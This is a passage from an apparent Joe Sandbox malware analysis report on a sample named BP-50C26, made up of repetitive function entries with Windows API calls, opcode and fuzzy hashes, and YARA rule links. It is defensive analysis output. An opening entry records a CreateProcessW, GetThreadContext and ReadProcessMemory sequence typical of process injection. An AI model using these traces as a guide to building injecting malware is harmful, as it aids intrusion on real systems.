                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 014E136B
                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014E1401
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014E1423
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2043178485.00000000014DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014DF000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_14df000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 2438371351-0
                                                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                      • Instruction ID: 45ad83728ad06c7f28074411221ae53caca313cc5643f424496e1de23721969c
                                                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                      • Instruction Fuzzy Hash: A912FD24E24658C6EB24DF64D8507DEB272EF68700F1090E9910DEB7A4E77A4F81CF5A
                                                                                      Function 00C9709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString
                                                                                      • String ID:
                                                                                      • API String ID: 2948472770-0
                                                                                      • Opcode ID: 3138b71c4d6c9bbdcad8dc93078870792c752e4cfd968889f9a953d73728dcba
                                                                                      • Instruction ID: 18c81d1923b0ebf901e00f20a557f427294aa18a0981d820f7da7d80c63c0ebf
                                                                                      • Opcode Fuzzy Hash: 3138b71c4d6c9bbdcad8dc93078870792c752e4cfd968889f9a953d73728dcba
                                                                                      • Instruction Fuzzy Hash: B6D17B74A05209EFCF14EF98C8859EDBBB5FF48310F244159E915AB291EB30AE81DF90
                                                                                      Function 00C2FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction ID: a70bab6be3137fa4d4a32654adf87c693607bd239599d301ac18b26d8db680ce
                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                      • Instruction Fuzzy Hash: 7C31E374A0011D9BD728CF59E490969F7B1FB49300F2486B9E81ACBA56D731EEC2CBC0
                                                                                      Function 00C14ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C14E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E9C
                                                                                        • Part of subcall function 00C14E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C14EAE
                                                                                        • Part of subcall function 00C14E90: FreeLibrary.KERNEL32(00000000,?,?,00C14EDD,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14EC0
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14EFD
                                                                                        • Part of subcall function 00C14E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E62
                                                                                        • Part of subcall function 00C14E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C14E74
                                                                                        • Part of subcall function 00C14E59: FreeLibrary.KERNEL32(00000000,?,?,00C53CDE,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14E87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                      • String ID:
                                                                                      • API String ID: 2632591731-0
                                                                                      • Opcode ID: 9d61baab3f7f2ed2ee4a07f0540508bd6b50f2519abf4072cc600783daa51e3f
                                                                                      • Instruction ID: e50388d7b155e8791df8578f142b65119f68828a21222c94b3802273f8f76944
                                                                                      • Opcode Fuzzy Hash: 9d61baab3f7f2ed2ee4a07f0540508bd6b50f2519abf4072cc600783daa51e3f
                                                                                      • Instruction Fuzzy Hash: 0911E732610205ABCF18BBA4DC02FED77A59F82711F20842DF552AA2C1DE719A85F750
                                                                                      Function 00C48402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: __wsopen_s
                                                                                      • String ID:
                                                                                      • API String ID: 3347428461-0
                                                                                      • Opcode ID: ef302413b9c89b815779d694f470e37c44befb35b915755b0bfaa517f4b186e9
                                                                                      • Instruction ID: e4ee51ea8f577b13497d7c8538df9fa178488406d564013796df84fe08c676ad
                                                                                      • Opcode Fuzzy Hash: ef302413b9c89b815779d694f470e37c44befb35b915755b0bfaa517f4b186e9
                                                                                      • Instruction Fuzzy Hash: E911187590420AAFCB05DF58E941A9E7BF5FF48314F144059FC18AB312DA31DA15CBA5
                                                                                      Function 00C45000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C44C7D: RtlAllocateHeap.NTDLL(00000008,00C11129,00000000,?,00C42E29,00000001,00000364,?,?,?,00C3F2DE,00C43863,00CE1444,?,00C2FDF5,?), ref: 00C44CBE
                                                                                      • _free.LIBCMT ref: 00C4506C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 614378929-0
                                                                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                      • Instruction ID: f427180be7e5386ebbdd3bd0223b2524740e8d6c01f8ccee54736913b91b2948
                                                                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                      • Instruction Fuzzy Hash: 900145766047056BE3318F69D881A9AFBEDFB89370F65062DF194832C1EB30A905C7B4
                                                                                      Function 00C3E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                      • Instruction ID: e4daa1e4997b67118895c72fbf7925137d7107ec55e65598de56941f08b96584
                                                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                      • Instruction Fuzzy Hash: 6AF0F432930A18D6D6313A6A9C06B9A33A8AF62335F100719F821921D2CB70D906A7A5
                                                                                      Function 00C19CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 176396367-0
                                                                                      • Opcode ID: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                                                      • Instruction ID: 7b3c32f3147b1f39bcd9dbf739554d7d0a846758973b17f986b31ff7030d8279
                                                                                      • Opcode Fuzzy Hash: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
                                                                                      • Instruction Fuzzy Hash: 65F0C8B36007146ED7159F29D806BA7BBA8EB44760F10853EF619CB1D1DB31E55097E0
                                                                                      Function 00C44C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,00C11129,00000000,?,00C42E29,00000001,00000364,?,?,?,00C3F2DE,00C43863,00CE1444,?,00C2FDF5,?), ref: 00C44CBE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: dac041c64f9ecdb049d72856b26171362e2b683e8575ce2583d614211ff70a6e
                                                                                      • Instruction ID: 8840b629383fb421074363b0db30c803b1393e076dc14daa8d8f96fcb6c73c6e
                                                                                      • Opcode Fuzzy Hash: dac041c64f9ecdb049d72856b26171362e2b683e8575ce2583d614211ff70a6e
                                                                                      • Instruction Fuzzy Hash: 0CF0E93160222467DB295F66AC85B5F3788BF417A1F3C4115BC25AB190CA30D90156E0
                                                                                      Function 00C43820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 85c983a9527dfcf24be8770c592331207b472f57b958d932958a64eddcbec968
                                                                                      • Instruction ID: ced4b39648fdbfd382e93790be35a42c87ee79a31115ecf0153b88ded9b92432
                                                                                      • Opcode Fuzzy Hash: 85c983a9527dfcf24be8770c592331207b472f57b958d932958a64eddcbec968
                                                                                      • Instruction Fuzzy Hash: 6CE022312002A4AAE7312AB79C00B9FF749BFC27B4F090023BC24964D0DB21EF0196F0
                                                                                      Function 00C14F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,00CE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00C14F6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: c80adddd118dc1b783cbf1b1b9de7da262a051322131f519673ead2c08bad2aa
                                                                                      • Instruction ID: 804b561c50bec8bd16c1895399c12b3c0bb7412db046869cf437cc266b45d9a6
                                                                                      • Opcode Fuzzy Hash: c80adddd118dc1b783cbf1b1b9de7da262a051322131f519673ead2c08bad2aa
                                                                                      • Instruction Fuzzy Hash: FBF0A070105301CFCB388FA1D490896B7F0EF02319310897EE1EA87610C7319885EF00
                                                                                      Function 00C7CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00C5EE51,00CD3630,00000002), ref: 00C7CD26
                                                                                        • Part of subcall function 00C7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00C7CD19,?,?,?), ref: 00C7CC59
                                                                                        • Part of subcall function 00C7CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00C7CD19,?,?,?,?,00C5EE51,00CD3630,00000002), ref: 00C7CC6E
                                                                                        • Part of subcall function 00C7CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00C7CD19,?,?,?,?,00C5EE51,00CD3630,00000002), ref: 00C7CC7A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Pointer$Write
                                                                                      • String ID:
                                                                                      • API String ID: 3847668363-0
                                                                                      • Opcode ID: 61a7f678a4d9c4a67563a308470f9d148c6ead40d079f1ff5bafabf222585681
                                                                                      • Instruction ID: 93802810ae028c38e87bb0c602c140e5b7bcdeffc04a2a48982b9295950fabe6
                                                                                      • Opcode Fuzzy Hash: 61a7f678a4d9c4a67563a308470f9d148c6ead40d079f1ff5bafabf222585681
                                                                                      • Instruction Fuzzy Hash: 6BE06D7A500704EFC7219F8ADD418AABBF9FF85360710852FE99AC2110D7B1AA14DB60
                                                                                      Function 00C12DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C12DC4
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongNamePath_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 541455249-0
                                                                                      • Opcode ID: 0c6625b0c231b56218a6c8fd57c5693487d7bbc2f7dc14ffcd092ca3902fe1af
                                                                                      • Instruction ID: 3d100ef68f3ca39f8b7477208162991d90742ff802e8d9be7e25d2b6853f07f5
                                                                                      • Opcode Fuzzy Hash: 0c6625b0c231b56218a6c8fd57c5693487d7bbc2f7dc14ffcd092ca3902fe1af
                                                                                      • Instruction Fuzzy Hash: 31E0C276A042245BCB20E6989C0AFEA77EDDFC9790F0501B1FD09E7248DA60ADC49690
                                                                                      Function 00C12B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C13837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C13908
                                                                                        • Part of subcall function 00C1D730: GetInputState.USER32 ref: 00C1D807
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C12B6B
                                                                                        • Part of subcall function 00C130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00C1314E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                      • String ID:
                                                                                      • API String ID: 3667716007-0
                                                                                      • Opcode ID: a4d6ed860dc547f9f9847e5e37ed2a078ae2608b47a7bcdbfe15f7eaae6ac212
                                                                                      • Instruction ID: b3e6a785c25b9396e3a64328fdc571ab5ab12e05430ffaf90ac3e0c87b232de3
                                                                                      • Opcode Fuzzy Hash: a4d6ed860dc547f9f9847e5e37ed2a078ae2608b47a7bcdbfe15f7eaae6ac212
                                                                                      • Instruction Fuzzy Hash: EEE026313042C407CA04BB30A8526EDA3998BD3319F00043EF143472E2CE308AD57352
                                                                                      Function 00C5039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00C50704,?,?,00000000,?,00C50704,00000000,0000000C), ref: 00C503B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 8678e3a9d1b62abc64c9f296d45c58f3279465bd3b52d68aa2d1e5ec9849570e
                                                                                      • Instruction ID: 3d89e53b540e66d35c750de6e90375187ba107a42f7e33baa0d810f9b2d833b0
                                                                                      • Opcode Fuzzy Hash: 8678e3a9d1b62abc64c9f296d45c58f3279465bd3b52d68aa2d1e5ec9849570e
                                                                                      • Instruction Fuzzy Hash: EDD06C3214010DBBDF028F84DD46EDE3BAAFB48714F014000BE1856020C736E821AB90
                                                                                      Function 00C11CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00C11CBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem
                                                                                      • String ID:
                                                                                      • API String ID: 3098949447-0
                                                                                      • Opcode ID: 3d67ceb70d14e527785581e1b9f84decc9b200862f71dfa49b701ca1146745cc
                                                                                      • Instruction ID: c838fcc5682a6e38b41c8ac5e908f5553f484c40a0e506ed8389af4a87ac3e93
                                                                                      • Opcode Fuzzy Hash: 3d67ceb70d14e527785581e1b9f84decc9b200862f71dfa49b701ca1146745cc
                                                                                      • Instruction Fuzzy Hash: D6C09B352803449FF2144B80BDCAF287754A348B04F444001F6095D5F3C7B11820F650
                                                                                      Function 00C8744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
